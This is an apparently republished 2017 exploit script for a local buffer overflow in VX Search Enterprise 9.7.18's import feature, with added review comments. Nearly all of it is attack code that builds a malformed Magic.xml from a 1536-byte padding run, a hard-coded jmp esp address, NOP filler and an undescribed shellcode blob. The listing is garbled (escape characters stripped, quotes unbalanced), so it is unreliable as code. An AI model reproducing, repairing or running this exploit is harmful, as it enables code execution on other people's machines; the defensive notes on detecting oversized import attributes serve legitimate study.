VX Search Enterprise 9.7.18 Local Buffer Overflow
Posted on 16 June 2017
# Proof-of-concept generator for the VX Search Enterprise v9.7.18 import
# buffer overflow described in the header string below. All it does is build
# a malformed XML file (Magic.xml) in the current directory; the file is meant
# to be loaded through the product's import feature on the local machine.
#
# NOTE(review): this listing was damaged when the page was extracted. The
# byte-string literals carry no escape sequences, the quoting on the `evil`
# line is unbalanced, and `print` is a Python 2 statement, so the script does
# not run as printed. The code is left exactly as published.
#
# Defensive reading: the oversized value travels in the `name` attribute of a
# <classify> element, so an import file whose `name` attribute is longer than
# roughly 1.5 KB is the artefact to look for. Treat import/configuration files
# from untrusted sources as hostile input, and confirm with the vendor whether
# a later release bounds this field.

# Neither module is referenced anywhere in the visible script.
import os
import struct

# Author/advisory banner kept as a string; it is never printed or written out.
author = ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln. # Date: 2017.06.15 # Exploit Author: Greg Priest # Version: VX Search Enterprise v9.7.18 # Tested on: Windows7 x64 HUN/ENG Professional '''

# Padding of 1536 "A" characters that precedes the control value below.
overflow = "A" * 1536

# Value placed directly after the padding. The name suggests the address of a
# `jmp esp` instruction in some loaded module -- TODO confirm; the page does
# not name the module. A hard-coded address like this presumably relies on
# that module loading at a fixed base. The trailing comment is the author's
# alternative value.
jmp_esp = "x4Ex21x1Fx65" #"x94x21x1Cx65"

# Named as a short jump; it sits between the first and second filler runs.
shortjump = "xEBx55"

# Opaque payload blob. The page does not say what it does; treat it as
# untrusted and do not execute it.
shellcode3= ("xbex7ax1fx2dx97xdaxd5xd9x74x24xf4x5ax33xc9xb1"
"x30x83xc2x04x31x72x0fx03x72x75xfdxd8x6bx61x83"
"x23x94x71xe4xaax71x40x24xc8xf2xf2x94x9ax57xfe"
"x5fxcex43x75x2dxc7x64x3ex98x31x4axbfxb1x02xcd"
"x43xc8x56x2dx7ax03xabx2cxbbx7ex46x7cx14xf4xf5"
"x91x11x40xc6x1ax69x44x4exfex39x67x7fx51x32x3e"
"x5fx53x97x4axd6x4bxf4x77xa0xe0xcex0cx33x21x1f"
"xecx98x0cx90x1fxe0x49x16xc0x97xa3x65x7dxa0x77"
"x14x59x25x6cxbex2ax9dx48x3fxfex78x1ax33x4bx0e"
"x44x57x4axc3xfex63xc7xe2xd0xe2x93xc0xf4xafx40"
"x68xacx15x26x95xaexf6x97x33xa4x1axc3x49xe7x70"
"x12xdfx9dx36x14xdfx9dx66x7dxeex16xe9xfaxefxfc"
"x4exf4xa5x5dxe6x9dx63x34xbbxc3x93xe2xffxfdx17"
"x07x7fxfax08x62x7ax46x8fx9exf6xd7x7axa1xa5xd8"
"xaexc2x28x4bx32x05")

# Final attribute value, in order: padding, control value, 24 filler units,
# the short jump, 76 + 58 further filler units, then the payload blob.
crash = overflow+jmp_esp+"x90"*24+shortjump+"x90"*76+"x90" * 58+shellcode3

# Wraps the value in a minimal XML document as the `name` attribute of a
# <classify> element. NOTE(review): the quotes around `+ crash +` do not
# balance as printed, so this line is not valid Python in this listing.
evil = '<?xml version="1.0" encoding="UTF-8"?> <classify name='' + crash + ' </classify>'

# Writes the document to Magic.xml in the working directory (text mode,
# overwriting any existing file), then reports completion.
exploit = open('Magic.xml', 'w')
exploit.write(evil)
exploit.close()
print "Magic.xml raedy!"